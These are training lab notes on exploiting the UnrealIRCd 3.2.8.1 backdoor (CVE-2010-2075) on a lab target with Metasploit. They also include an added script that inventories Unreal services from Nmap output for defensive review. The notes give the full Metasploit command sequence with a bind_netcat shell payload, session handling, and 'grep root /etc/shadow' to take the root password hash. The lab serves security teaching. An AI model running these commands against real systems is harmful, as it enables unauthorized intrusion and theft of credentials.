Lesson 3 Lab Notes

In this lab we will do the following:
  • Use the saved Nmap results to search for the Unreal daemon.
  • Exploit the Unreal daemon.
  • Obtain root.
  • Copy the root hash.
What is UnrealIRCd?

UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new features have been added and modified, including advanced security features and bug fixes, and it has become a popular server.

CVE Information:

http://www.cvedetails.com/cve/cve-2010-2075

UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.
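A defender can use the same saved Nmap results to list every host running an Unreal daemon and flag the ones whose installed tarball needs checking. The script below is an added example, not part of the original lab: it assumes the scan was saved in grepable format (-oG), the function names are hypothetical, and the sample scan lines are constructed.

```shell
#!/usr/bin/env bash
# Added example: inventory UnrealIRCd services in saved Nmap grepable output.

# Constructed sample lines in -oG layout (tab-separated Host/Ports fields).
sample_scan() {
  printf 'Host: 172.16.56.2 ()\tStatus: Up\n'
  printf 'Host: 172.16.56.2 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.7p1/, 6667/open/tcp//irc//UnrealIRCd 3.2.8.1/\n'
  printf 'Host: 172.16.56.9 ()\tPorts: 6667/closed/tcp//irc///, 6697/open/tcp//irc//UnrealIRCd/\n'
  printf 'Host: 172.16.56.10 ()\tPorts: 6667/open/tcp//irc//UnrealIRCd 4.0.1/\n'
}

# find_unreal [FILE]  (reads stdin when FILE is omitted)
# Prints "host port version status" for each open port whose service or
# version field mentions "unreal". Status is REVIEW when the version is
# 3.2.8.1 (the release named in CVE-2010-2075) or when Nmap reported no
# version at all, since an unversioned banner cannot rule that release out.
find_unreal() {
  awk -F'\t' '
    /^Host: / {
      split($1, h, " "); host = h[2]
      for (i = 2; i <= NF; i++) {
        if ($i !~ /^Ports: /) continue
        n = split(substr($i, 8), entry, /, */)
        for (j = 1; j <= n; j++) {
          # Entry layout: port/state/proto/owner/service/rpcinfo/version/
          split(entry[j], f, "/")
          if (f[2] != "open") continue
          if (tolower(f[5] " " f[7]) !~ /unreal/) continue
          ver = "unknown"
          if (match(f[7], /[0-9]+(\.[0-9]+)+/))
            ver = substr(f[7], RSTART, RLENGTH)
          status = (ver == "3.2.8.1" || ver == "unknown") ? "REVIEW" : "other"
          print host, f[1], ver, status
        }
      }
    }' "${1:--}"
}

sample_scan | find_unreal
```

A REVIEW line means the installed tarball on that host should be compared against the checksum published by the UnrealIRCd project, because the CVE only affects copies obtained from the compromised mirrors.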

Module Information:

Rapid7 shows you which Metasploit module to use: https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor

Exploit-DB shows you the code of the module: https://www.exploit-db.com/exploits/16922/

Instructions:
search unreal
use exploit/unix/irc/unreal_ircd_3281_backdoor
set PAYLOAD cmd/unix/bind_netcat
show options
set RHOST 172.16.56.2
set LHOST 172.16.56.4 (use your own IP address, e.g. 10.0.2.15)

To run the exploit and immediately background the session, use the -z switch. If you expect to have more than one session, use the -j switch instead. To interact with a backgrounded session, use the 'sessions -i ID' command.

exploit -z
sessions -l
sessions -i 1

It's always a good idea to run some basic commands like whoami and hostname to verify your victim's information.

whoami
hostname

Now we use grep to output only the password hash for the root user, located in the /etc/shadow file. :)

grep root /etc/shadow

http://computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson7/index.html
